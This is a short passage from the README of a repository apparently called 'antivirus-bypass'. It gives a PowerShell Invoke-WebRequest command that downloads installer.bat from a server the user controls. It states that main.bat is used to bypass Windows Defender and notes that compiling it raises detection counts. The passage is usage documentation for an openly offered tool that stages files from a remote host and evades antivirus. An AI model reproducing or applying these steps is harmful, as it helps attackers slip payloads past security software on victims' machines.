slezercc/antivirus-bypass/README.md

 ```bat
 Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.bat' -OutFile installer.bat" # Replace https://YOURSITE.COM/installer.bat with your webserver URL and the path to the installer.bat file.
 If you use replit, it should look like this: https://replname.wnetmc.repl.co/installer.bat
 ```
 6, Done.
 The file you would use to bypass windows defender would be main.bat.
 You can convert it to an executable but this will raise the number of detections.
+If this helped you, make sure to star this repository (;